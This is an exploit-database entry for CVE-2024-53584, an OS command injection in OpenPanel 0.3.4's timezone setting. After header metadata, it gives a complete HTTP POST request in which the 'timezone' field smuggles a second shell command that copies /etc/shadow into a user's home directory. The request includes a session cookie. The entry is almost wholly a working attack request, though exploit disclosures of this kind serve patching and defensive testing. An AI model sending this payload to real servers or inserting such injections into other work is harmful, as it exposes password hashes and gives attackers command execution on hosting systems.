# Exploit Title: OpenPanel 0.3.4 - OS Command Injection via The Timezone Parameter # Date: Nov 25, 2024 # Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee # Vendor Homepage: https://openpanel.com/ # Software Link: https://openpanel.com/ # Version: 0.3.4 # Tested on: macOS # CVE : CVE-2024-53584 POST /server/timezone HTTP/2 Host: demo.openpanel.org:2083 Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://demo.openpanel.org:2083/server/timezone Content-Type: application/x-www-form-urlencoded Content-Length: 51 Origin: https://demo.openpanel.org:2083 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt